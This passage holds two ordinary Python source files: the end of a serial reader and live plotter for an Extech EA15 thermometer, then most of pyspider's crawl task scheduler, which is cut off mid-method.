# 02 00 8c 80 03 <= empty datalog 35968
# 02 00 8c 8c 03 <= 1 datalog entry 35980 12 = 1*5 + 1*7
# 02 00 8c 93 03 <= 2 datalog entries 35987 19 = 1*5 + 2*7
# 02 00 8c a1 03 <= 4 datalog entries 36001 33 = 1*5 + 4*7
# 02 00 8c c9 03 <= 2 sets with 1 and 8 records 36041 73 = 2*5 + 9*7
# 02 00 8d 57 03 <= 30 datalog entries 36183 215 = 1*5 + 30*7
self.datalog_expected_ = buf[2] * 256 + buf[3] - 0x8c80
if self.datalog_expected_ == 0:
print(f'Datalog is empty')
self.datalog_download_state_ = 0
else:
print(f'Expecting {self.datalog_expected_} bytes from datalog')
self.datalog_download_state_ = 2
elif packet_type == 3:
self.datalog_download_state_ = 0
self.datalog_expected_ = 0
return self.decode2(buf, datetime.datetime.now())
def decode_loop(self):
while True:
v = self.decode_one()
if v is None:
continue
print(v)
def download_datalog(self):
if self.datalog_download_state_ == 0:
self.download_datalog_ = True
class ExtechEA15Threaded:
def __init__(self, dev_fn='', timeformat='datetime'):
self.q = mp.Queue()
self.q2 = mp.Queue()
self.q3 = mp.Queue()
self.dev_fn_ = dev_fn
self.ea15 = ExtechEA15Serial(dev_fn, timeformat=timeformat)
self.download_datalog_ = False
def __del__(self):
pass
def __enter__(self):
self.run()
return self
def __exit__(self, type_, value, tb):
pass
def open(self, dev_fn):
self.ea15.open(dev_fn)
def run(self):
p = mp.Process(target=self.main, args=(self,))
p.start()
def main(self_, self):
# self.ea15 = ExtechEA15(self.dev_fn_)
while True:
if not self.q3.empty():
s = self.q3.get()
if s == 'Datalog':
self.ea15.download_datalog()
v = self.ea15.decode_one()
if v is None:
pass
elif isinstance(v, dict):
self.q.put(v)
elif isinstance(v, list):
self.q2.put(v)
def download_datalog(self):
self.q3.put('Datalog')
def main(dev_fn):
def decode(v):
return f'{v["dt"]} : {v["t1"]} : {v["t2"]} : {v["type"]} : {v["valid"]}'
# Below are a few different ways to use the classes
if False:
with ExtechEA15Serial(dev_fn) as ea15:
ea15.decode_loop()
if False:
with ExtechEA15Serial(dev_fn) as ea15:
for i in range(3):
print(i, ea15.decode_one())
if False:
ea15 = ExtechEA15Serial(dev_fn)
print(ea15.decode_one())
if False:
ea15 = ExtechEA15Threaded(dev_fn)
ea15.run()
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
if False:
with ExtechEA15Threaded(dev_fn, timeformat='dt') as ea15:
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
# import queue
# try:
# v = ea15.q.get(timeout=.05)
# print('dequeued', v)
# except queue.Empty:
# print('timeout')
if random.random() < .05:
print('Requesting datalog download')
ea15.download_datalog()
while not ea15.q2.empty():
v2_ = ea15.q2.get()
for j, v2 in enumerate(v2_):
sps, lst = v2
print(f'Datalog set {j + 1} with {len(lst)} records, sampled every {sps} seconds')
for i, v in enumerate(lst):
# v['dt'] = i * sps
print(f'{j + 1:02d} : {i + 1:04d} : {decode(v)}')
time.sleep(.5)
if True:
import matplotlib.pyplot as plt
# If you encounter an error about not being able to use the TkInter matplotlib backend
# or unable to load the tkinter module, try the following. (TkInter cannot be installed
# by pipenv.)
# sudo apt-get install python3-tk
plt.ion()
fig = plt.figure()
ax = fig.add_subplot(111)
x = []
y1 = []
y2 = []
line1, = ax.plot(x, y1, 'r-', label='T1') # Returns a tuple of line objects, thus the comma
line2, = ax.plot(x, y2, 'b-', label='T2') # Returns a tuple of line objects, thus the comma
ax.set_xlabel('Time [s]')
ax.set_ylabel('Temperature [C]')
plt.legend()
with ExtechEA15Threaded(dev_fn) as ea15:
t0 = 0
while True:
while not ea15.q.empty():
v = ea15.q.get()
print(decode(v))
if not v['valid']:
continue
y1 += [v['t1'].C()]
y2 += [v['t2'].C()]
if x == []:
t0 = v['dt']
x += [(v['dt'] - t0).total_seconds()]
line1.set_xdata(x)
line1.set_ydata(y1)
line2.set_xdata(x)
line2.set_ydata(y2)
ax.relim()
ax.autoscale_view()
fig.canvas.draw()
fig.canvas.flush_events()
time.sleep(.5)
def find_dev(id_str):
import os
dn = '/dev/serial/by-id/'
for fn in os.listdir(dn):
if id_str in fn:
return os.path.join(dn, fn)
return ''
if __name__ == "__main__":
dev_fn = find_dev('usb-Prolific_Technology_Inc._USB-Serial_Controller')
if not dev_fn:
print('No device found')
else:
print('Using device:', dev_fn)
main(dev_fn)
|
scheduler.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if (self.md5sum != md5sum or self.waiting_get_info) and self.active:
self._send_on_get_info = True
self.waiting_get_info = True
self.md5sum = md5sum
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
STATUS_PACK = 2 # current not used
REQUEST_PACK = 3 # current not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
for project in self.projectdb.check_update(self._last_update_project):
self._update_project(project)
logger.debug("project: %s updated.", project['name'])
self._force_update_project = False
self._last_update_project = now
get_info_attributes = ['min_tick', 'retry_delay', 'crawl_config']
def _update_project(self, project):
'''update one project'''
if project['name'] not in self.projects:
self.projects[project['name']] = Project(self, project)
else:
self.projects[project['name']].update(project)
project = self.projects[project['name']]
if project._send_on_get_info:
# update project runtime info from processor by sending a _on_get_info
# request, result is in status_page.track.save
project._send_on_get_info = False
self.on_select_task({
'taskid': '_on_get_info',
'project': project.name,
'url': 'data:,_on_get_info',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': self.get_info_attributes,
},
'process': {
'callback': '_on_get_info',
},
})
# load task queue when project is running and delete task_queue when project is stoped
if project.active:
if not project.task_loaded:
self._load_tasks(project)
project.task_loaded = True
else:
if project.task_loaded:
project.task_queue = TaskQueue()
project.task_loaded = False
if project not in self._cnt['all']:
self._update_project_cnt(project.name)
scheduler_task_fields = ['taskid', 'project', 'schedule', ]
def _load_tasks(self, project):
'''load tasks from database'''
task_queue = project.task_queue
for task in self.taskdb.load_tasks(
self.taskdb.ACTIVE, project.name, self.scheduler_task_fields
):
taskid = task['taskid']
_schedule = task.get('schedule', self.default_schedule)
priority = _schedule.get('priority', self.default_schedule['priority'])
exetime = _schedule.get('exetime', self.default_schedule['exetime'])
task_queue.put(taskid, priority, exetime)
project.task_loaded = True
logger.debug('project: %s loaded %d tasks.', project.name, len(task_queue))
if project not in self._cnt['all']:
self._update_project_cnt(project)
self._cnt['all'].value((project.name, 'pending'), len(project.task_queue))
def _update_project_cnt(self, project_name):
status_count = self.taskdb.status_count(project_name)
self._cnt['all'].value(
(project_name, 'success'),
status_count.get(self.taskdb.SUCCESS, 0)
)
self._cnt['all'].value(
(project_name, 'failed'),
status_count.get(self.taskdb.FAILED, 0) + status_count.get(self.taskdb.BAD, 0)
)
self._cnt['all'].value(
(project_name, 'pending'),
status_count.get(self.taskdb.ACTIVE, 0)
)
def task_verify(self, task):
'''
return False if any of 'taskid', 'project', 'url' is not in task dict
or project in not in task_queue
'''
for each in ('taskid', 'project', 'url', ):
if each not in task or not task[each]:
logger.error('%s not in task: %.200r', each, task)
return False
if task['project'] not in self.projects:
logger.error('unknown project: %s', task['project'])
return False
project = self.projects[task['project']]
if not project.active:
logger.error('project %s not started, please set status to RUNNING or DEBUG',
task['project'])
return False
return True
def insert_task(self, task):
'''insert task into database'''
return self.taskdb.insert(task['project'], task['taskid'], task)
def update_task(self, task):
'''update task in database'''
return self.taskdb.update(task['project'], task['taskid'], task)
def put_task(self, task):
'''put task to task queue'''
_schedule = task.get('schedule', self.default_schedule)
self.projects[task['project']].task_queue.put(
task['taskid'],
priority=_schedule.get('priority', self.default_schedule['priority']),
exetime=_schedule.get('exetime', self.default_schedule['exetime'])
)
def send_task(self, task, force=True):
'''
dispatch task to fetcher
out queue may have size limit to prevent block, a send_buffer is used
'''
try:
self.out_queue.put_nowait(task)
except Queue.Full:
if force:
self._send_buffer.appendleft(task)
else:
raise
def _check_task_done(self):
'''Check status queue'''
cnt = 0
try:
while True:
task = self.status_queue.get_nowait()
# check _on_get_info result here
if task.get('taskid') == '_on_get_info' and 'project' in task and 'track' in task:
if task['project'] not in self.projects:
continue
project = self.projects[task['project']]
project.on_get_info(task['track'].get('save') or {})
logger.info(
'%s on_get_info %r', task['project'], task['track'].get('save', {})
)
continue
elif not self.task_verify(task):
continue
self.on_task_status(task)
cnt += 1
except Queue.Empty:
pass
return cnt
merge_task_fields = ['taskid', 'project', 'url', 'status', 'schedule', 'lastcrawltime']
def _check_request(self):
'''Check new task queue'''
# check _postpone_request first
todo = []
for task in self._postpone_request:
if task['project'] not in self.projects:
continue
if self.projects[task['project']].task_queue.is_processing(task['taskid']):
todo.append(task)
else:
self.on_request(task)
self._postpone_request = todo
tasks = {}
while len(tasks) < self.LOOP_LIMIT:
try:
task = self.newtask_queue.get_nowait()
except Queue.Empty:
break
if isinstance(task, list):
_tasks = task
else:
_tasks = (task, )
for task in _tasks:
if not self.task_verify(task):
continue
if task['taskid'] in self.projects[task['project']].task_queue:
if not task.get('schedule', {}).get('force_update', False):
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
continue
if task['taskid'] in tasks:
if not task.get('schedule', {}).get('force_update', False):
continue
tasks[task['taskid']] = task
for task in itervalues(tasks):
self.on_request(task)
return len(tasks)
def _check_cronjob(self):
"""Check projects cronjob tick, return True when a new tick is sended"""
now = time.time()
self._last_tick = int(self._last_tick)
if now - self._last_tick < 1:
return False
self._last_tick += 1
for project in itervalues(self.projects):
if not project.active:
continue
if project.waiting_get_info:
continue
if project.min_tick == 0:
continue
if self._last_tick % int(project.min_tick) != 0:
continue
self.on_select_task({
'taskid': '_on_cronjob',
'project': project.name,
'url': 'data:,_on_cronjob',
'status': self.taskdb.SUCCESS,
'fetch': {
'save': {
'tick': self._last_tick,
},
},
'process': {
'callback': '_on_cronjob',
},
})
return True
request_task_fields = [
'taskid',
'project',
'url',
'status',
'schedule',
'fetch',
'process',
'track',
'lastcrawltime'
]
def _check_select(self):
'''Select task to fetch & process'''
while self._send_buffer:
_task = self._send_buffer.pop()
try:
# use force=False here to prevent automatic send_buffer append and get exception
self.send_task(_task, False)
except Queue.Full:
self._send_buffer.append(_task)
break
if self.out_queue.full():
return {}
taskids = []
cnt = 0
cnt_dict = dict()
limit = self.LOOP_LIMIT
for project in itervalues(self.projects):
if not project.active:
continue
# only check project pause when select new tasks, cronjob and new request still working
if project.paused:
continue
if project.waiting_get_info:
continue
if cnt >= limit:
break
# task queue
task_queue = project.task_queue
task_queue.check_update()
project_cnt = 0
# check send_buffer here. when not empty, out_queue may blocked. Not sending tasks
while cnt < limit and project_cnt < limit / 10:
taskid = task_queue.get()
if not taskid:
break
taskids.append((project.name, taskid))
if taskid != 'on_finished':
project_cnt += 1
cnt += 1
cnt_dict[project.name] = project_cnt
if project_cnt:
project._selected_tasks = True
project._send_finished_event_wait = 0
# check and send finished event to project
if not project_cnt and len(task_queue) == 0 and project._selected_tasks:
# wait for self.FAIL_PAUSE_NUM steps to make sure all tasks in queue have been processed
if project._send_finished_event_wait < self.FAIL_PAUSE_NUM:
project._send_finished_event_wait += 1
else:
project._selected_tasks = False
project._send_finished_event_wait = 0
self.newtask_queue.put({
'project': project.name,
'taskid': 'on_finished',
'url': 'data:,on_finished',
'process': {
'callback': 'on_finished',
},
"schedule": {
"age": 0,
"priority": 9,
"force_update": True,
},
})
for project, taskid in taskids:
self._load_put_task(project, taskid)
return cnt_dict
def _load_put_task(self, project, taskid):
try:
task = self.taskdb.get_task(project, taskid, fields=self.request_task_fields)
except ValueError:
logger.error('bad task pack %s:%s', project, taskid)
return
if not task:
return
task = self.on_select_task(task)
def _print_counter_log(self):
# print top 5 active counters
keywords = ('pending', 'success', 'retry', 'failed')
total_cnt = {}
project_actives = []
project_fails = []
for key in keywords:
total_cnt[key] = 0
for project, subcounter in iteritems(self._cnt['5m']):
actives = 0
for key in keywords:
cnt = subcounter.get(key, None)
if cnt:
cnt = cnt.sum
total_cnt[key] += cnt
actives += cnt
project_actives.append((actives, project))
fails = subcounter.get('failed', None)
if fails:
project_fails.append((fails.sum, project))
top_2_fails = sorted(project_fails, reverse=True)[:2]
top_3_actives = sorted([x for x in project_actives if x[1] not in top_2_fails],
reverse=True)[:5 - len(top_2_fails)]
log_str = ("in 5m: new:%(pending)d,success:%(success)d,"
"retry:%(retry)d,failed:%(failed)d" % total_cnt)
for _, project in itertools.chain(top_3_actives, top_2_fails):
subcounter = self._cnt['5m'][project].to_dict(get_value='sum')
log_str += " %s:%d,%d,%d,%d" % (project,
subcounter.get('pending', 0),
subcounter.get('success', 0),
subcounter.get('retry', 0),
subcounter.get('failed', 0))
logger.info(log_str)
def _dump_cnt(self):
'''Dump counters to file'''
self._cnt['1h'].dump(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].dump(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].dump(os.path.join(self.data_path, 'scheduler.all'))
def _try_dump_cnt(self):
'''Dump counters every 60 seconds'''
now = time.time()
if now - self._last_dump_cnt > 60:
self._last_dump_cnt = now
self._dump_cnt()
self._print_counter_log()
def _check_delete(self):
'''Check project delete'''
now = time.time()
for project in list(itervalues(self.projects)):
if project.db_status != 'STOP':
continue
if now - project.updatetime < self.DELETE_TIME:
continue
if 'delete' not in self.projectdb.split_group(project.group):
continue
logger.warning("deleting project: %s!", project.name)
del self.projects[project.name]
self.taskdb.drop(project.name)
self.projectdb.drop(project.name)
if self.resultdb:
self.resultdb.drop(project.name)
for each in self._cnt.values():
del each[project.name]
def __len__(self):
return sum(len(x.task_queue) for x in itervalues(self.projects))
def quit(self):
'''Set quit signal'''
self._quit = True
# stop xmlrpc server
if hasattr(self, 'xmlrpc_server'):
self.xmlrpc_ioloop.add_callback(self.xmlrpc_server.stop)
self.xmlrpc_ioloop.add_callback(self.xmlrpc_ioloop.stop)
def run_once(self):
'''comsume queues and feed tasks to fetcher, once'''
self._update_projects()
self._check_task_done()
self._check_request()
while self._check_cronjob():
pass
self._check_select()
self._check_delete()
self._try_dump_cnt()
def run(self):
'''Start scheduler loop'''
logger.info("scheduler starting...")
while not self._quit:
try:
time.sleep(self.LOOP_INTERVAL)
self.run_once()
self._exceptions = 0
except KeyboardInterrupt:
break
except Exception as e:
logger.exception(e)
self._exceptions += 1
if self._exceptions > self.EXCEPTION_LIMIT:
break
continue
logger.info("scheduler exiting...")
self._dump_cnt()
def trigger_on_start(self, project):
'''trigger an on_start callback of project'''
self.newtask_queue.put({
"project": project,
"taskid": "on_start",
"url": "data:,on_start",
"process": {
"callback": "on_start",
},
})
def xmlrpc_run(self, port=23333, bind='127.0.0.1', logRequests=False):
'''Start xmlrpc interface'''
from pyspider.libs.wsgi_xmlrpc import WSGIXMLRPCApplication
application = WSGIXMLRPCApplication()
application.register_function(self.quit, '_quit')
application.register_function(self.__len__, 'size')
def dump_counter(_time, _type):
try:
return self._cnt[_time].to_dict(_type)
except:
logger.exception('')
application.register_function(dump_counter, 'counter')
def new_task(task):
if self.task_verify(task):
self.newtask_queue.put(task)
return True
return False
application.register_function(new_task, 'newtask')
def send_task(task):
'''dispatch task to fetcher'''
self.send_task(task)
return True
application.register_function(send_task, 'send_task')
def update_project():
self._force_update_project = True
application.register_function(update_project, 'update_project')
def get_active_tasks(project=None, limit=100):
allowed_keys = set((
'type',
'taskid',
'project',
'status',
'url',
'lastcrawltime',
'updatetime',
'track',
))
track_allowed_keys = set((
'ok',
'time',
'follows',
'status_code',
))
iters = [iter(x.active_tasks) for k, x in iteritems(self.projects)
if x and (k == project if project else True)]
tasks = [next(x, None) for x in iters]
result = []
while len(result) < limit and tasks and not all(x is None for x in tasks):
updatetime, task = t = max(t for t in tasks if t)
i = tasks.index(t)
tasks[i] = next(iters[i], None)
for key in list(task):
if key == 'track':
for k in list(task[key].get('fetch', [])):
if k not in track_allowed_keys:
del task[key]['fetch'][k]
for k in list(task[key].get('process', [])):
if k not in track_allowed_keys:
del task[key]['process'][k]
if key in allowed_keys:
continue
del task[key]
result.append(t)
# fix for "<type 'exceptions.TypeError'>:dictionary key must be string"
# have no idea why
return json.loads(json.dumps(result))
application.register_function(get_active_tasks, 'get_active_tasks')
def get_projects_pause_status():
result = {}
for project_name, project in iteritems(self.projects):
result[project_name] = project.paused
return result
application.register_function(get_projects_pause_status, 'get_projects_pause_status')
def webui_update():
return {
'pause_status': get_projects_pause_status(),
'counter': {
'5m_time': dump_counter('5m_time', 'avg'),
'5m': dump_counter('5m', 'sum'),
'1h': dump_counter('1h', 'sum'),
'1d': dump_counter('1d', 'sum'),
'all': dump_counter('all', 'sum'),
},
}
application.register_function(webui_update, 'webui_update')
import tornado.wsgi
import tornado.ioloop
import tornado.httpserver
container = tornado.wsgi.WSGIContainer(application)
self.xmlrpc_ioloop = tornado.ioloop.IOLoop()
self.xmlrpc_server = tornado.httpserver.HTTPServer(container, io_loop=self.xmlrpc_ioloop)
self.xmlrpc_server.listen(port=port, address=bind)
logger.info('scheduler.xmlrpc listening on %s:%s', bind, port)
self.xmlrpc_ioloop.start()
def on_request(self, task):
if self.INQUEUE_LIMIT and len(self.projects[task['project']].task_queue) >= self.INQUEUE_LIMIT:
logger.debug('overflow task %(project)s:%(taskid)s %(url)s', task)
return
oldtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.merge_task_fields)
if oldtask:
return self.on_old_request(task, oldtask)
else:
return self.on_new_request(task)
def on_new_request(self, task):
'''Called when a new request is arrived'''
task['status'] = self.taskdb.ACTIVE
self.insert_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
self._cnt['all'].event((project, 'pending'), +1)
logger.info('new task %(project)s:%(taskid)s %(url)s', task)
return task
def on_old_request(self, task, old_task):
'''Called when a crawled task is arrived'''
now = time.time()
_schedule = task.get('schedule', self.default_schedule)
old_schedule = old_task.get('schedule', {})
if _schedule.get('force_update') and self.projects[task['project']].task_queue.is_processing(task['taskid']):
# when a task is in processing, the modify may conflict with the running task.
# postpone the modify after task finished.
logger.info('postpone modify task %(project)s:%(taskid)s %(url)s', task)
self._postpone_request.append(task)
return
restart = False
schedule_age = _schedule.get('age', self.default_schedule['age'])
if _schedule.get('itag') and _schedule['itag'] != old_schedule.get('itag'):
restart = True
elif schedule_age >= 0 and schedule_age + (old_task.get('lastcrawltime', 0) or 0) < now:
restart = True
elif _schedule.get('force_update'):
restart = True
if not restart:
logger.debug('ignore newtask %(project)s:%(taskid)s %(url)s', task)
return
if _schedule.get('cancel'):
logger.info('cancel task %(project)s:%(taskid)s %(url)s', task)
task['status'] = self.taskdb.BAD
self.update_task(task)
self.projects[task['project']].task_queue.delete(task['taskid'])
return task
task['status'] = self.taskdb.ACTIVE
self.update_task(task)
self.put_task(task)
project = task['project']
if old_task['status'] != self.taskdb.ACTIVE:
self._cnt['5m'].event((project, 'pending'), +1)
self._cnt['1h'].event((project, 'pending'), +1)
self._cnt['1d'].event((project, 'pending'), +1)
if old_task['status'] == self.taskdb.SUCCESS:
self._cnt['all'].event((project, 'success'), -1).event((project, 'pending'), +1)
elif old_task['status'] == self.taskdb.FAILED:
self._cnt['all'].event((project, 'failed'), -1).event((project, 'pending'), +1)
logger.info('restart task %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_status(self, task):
'''Called when a status pack is arrived'''
try:
procesok = task['track']['process']['ok']
if not self.projects[task['project']].task_queue.done(task['taskid']):
logging.error('not processing pack: %(project)s:%(taskid)s %(url)s', task)
return None
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
ret = self.on_task_done(task)
else:
ret = self.on_task_failed(task)
if task['track']['fetch'].get('time'):
self._cnt['5m_time'].event((task['project'], 'fetch_time'),
task['track']['fetch']['time'])
if task['track']['process'].get('time'):
self._cnt['5m_time'].event((task['project'], 'process_time'),
task['track']['process'].get('time'))
self.projects[task['project']].active_tasks.appendleft((time.time(), task))
return ret
def on_task_done(self, task):
'''Called when a task is done and success, called by `on_task_status`'''
task['status'] = self.taskdb.SUCCESS
task['lastcrawltime'] = time.time()
if 'schedule' in task:
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
task['status'] = self.taskdb.ACTIVE
next_exetime = task['schedule'].get('age')
task['schedule']['exetime'] = time.time() + next_exetime
self.put_task(task)
else:
del task['schedule']
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'success'), +1)
self._cnt['1h'].event((project, 'success'), +1)
self._cnt['1d'].event((project, 'success'), +1)
self._cnt['all'].event((project, 'success'), +1).event((project, 'pending'), -1)
logger.info('task done %(project)s:%(taskid)s %(url)s', task)
return task
def on_task_failed(self, task):
'''Called when a task is failed, called by `on_task_status`'''
if 'schedule' not in task:
old_task = self.taskdb.get_task(task['project'], task['taskid'], fields=['schedule'])
if old_task is None:
logging.error('unknown status pack: %s' % task)
return
task['schedule'] = old_task.get('schedule', {})
retries = task['schedule'].get('retries', self.default_schedule['retries'])
retried = task['schedule'].get('retried', 0)
project_info = self.projects[task['project']]
retry_delay = project_info.retry_delay or self.DEFAULT_RETRY_DELAY
next_exetime = retry_delay.get(retried, retry_delay.get('', self.DEFAULT_RETRY_DELAY['']))
if task['schedule'].get('auto_recrawl') and 'age' in task['schedule']:
next_exetime = min(next_exetime, task['schedule'].get('age'))
else:
if retried >= retries:
next_exetime = -1
elif 'age' in task['schedule'] and next_exetime > task['schedule'].get('age'):
next_exetime = task['schedule'].get('age')
if next_exetime < 0:
task['status'] = self.taskdb.FAILED
task['lastcrawltime'] = time.time()
self.update_task(task)
project = task['project']
self._cnt['5m'].event((project, 'failed'), +1)
self._cnt['1h'].event((project, 'failed'), +1)
self._cnt['1d'].event((project, 'failed'), +1)
self._cnt['all'].event((project, 'failed'), +1).event((project, 'pending'), -1)
logger.info('task failed %(project)s:%(taskid)s %(url)s' % task)
return task
else:
task['schedule']['retried'] = retried + 1
task['schedule']['exetime'] = time.time() + next_exetime
task['lastcrawltime'] = time.time()
self.update_task(task)
self.put_task(task)
project = task['project']
self._cnt['5m'].event((project, 'retry'), +1)
self._cnt['1h'].event((project, 'retry'), +1)
self._cnt['1d'].event((project, 'retry'), +1)
# self._cnt['all'].event((project, 'retry'), +1)
logger.info('task retry %d/%d %%(project)s:%%(taskid)s %%(url)s' % (
retried, retries), task)
return task
def on_select_task(self, task):
'''Called when a task is selected to fetch & process'''
# inject informations about project
logger.info('select %(project)s:%(taskid)s %(url)s', task)
project_info = self.projects.get(task['project'])
assert project_info, 'no such project'
task['type'] = self.TASK_PACK
task['group'] = project_info.group
task['project_md5sum'] = project_info.md5sum
task['project_updatetime'] = project_info.updatetime
# lazy join project.crawl_config
if getattr(project_info, 'crawl_config', None):
task = BaseHandler.task_join_crawl_config(task, project_info.crawl_config)
project_info.active_tasks.appendleft((time.time(), task))
self.send_task(task)
return task
from tornado import gen
class OneScheduler(Scheduler):
"""
Scheduler Mixin class for one mode
overwirted send_task method
call processor.on_task(fetcher.fetch(task)) instead of consuming queue
"""
def _check_select(self):
"""
interactive mode of select tasks
"""
if not self.interactive:
return super(OneScheduler, self)._check_select()
# waiting for running tasks
if self.running_task > 0:
return
is_crawled = []
def run(project=None):
return crawl('on_start', project=project)
def crawl(url, project=None, **kwargs):
"""
Crawl given url, same parameters as BaseHandler.crawl
url - url or taskid, parameters will be used if in taskdb
project - can be ignored if only one project exists.
"""
# looking up the project instance
if project is None:
if len(self.projects) == 1:
project = list(self.projects.keys())[0]
else:
raise LookupError('You need specify the project: %r'
% list(self.projects.keys()))
project_data = self.processor.project_manager.get(project)
if not project_data:
raise LookupError('no such project: %s' % project)
# get task package
instance = project_data['instance']
instance._reset()
task = instance.crawl(url, **kwargs)
if isinstance(task, list):
raise Exception('url list is not allowed in interactive mode')
# check task in taskdb
if not kwargs:
dbtask = self.taskdb.get_task(task['project'], task['taskid'],
fields=self.request_task_fields)
if not dbtask:
dbtask = self.taskdb.get_task(task['project'], task['url'],
fields=self.request_task_fields)
if dbtask:
task = dbtask
# select the task
self.on_select_task(task)
is_crawled.append(True)
shell.ask_exit()
def quit_interactive():
'''Quit interactive mode'''
is_crawled.append(True)
self.interactive = False
shell.ask_exit()
def quit_pyspider():
'''Close pyspider'''
is_crawled[:] = []
shell.ask_exit()
shell = utils.get_python_console()
banner = (
'pyspider shell - Select task\n'
'crawl(url, project=None, **kwargs) - same parameters as BaseHandler.crawl\n'
'quit_interactive() - Quit interactive mode\n'
'quit_pyspider() - Close pyspider'
)
if hasattr(shell, 'show_banner'):
shell.show_banner(banner)
shell.interact()
else:
shell.interact(banner)
if not is_crawled:
self.ioloop.add_callback(self.ioloop.stop)
def __getattr__(self, name):
"""patch for crawl(url, callback=self.index_page) API"""
if self.interactive:
return name
raise AttributeError(name)
def on_task_status(self, task):
"""Ignore not processing error in interactive mode"""
if not self.interactive:
super(OneScheduler, self).on_task_status(task)
try:
procesok = task['track']['process']['ok']
except KeyError as e:
logger.error("Bad status pack: %s", e)
return None
if procesok:
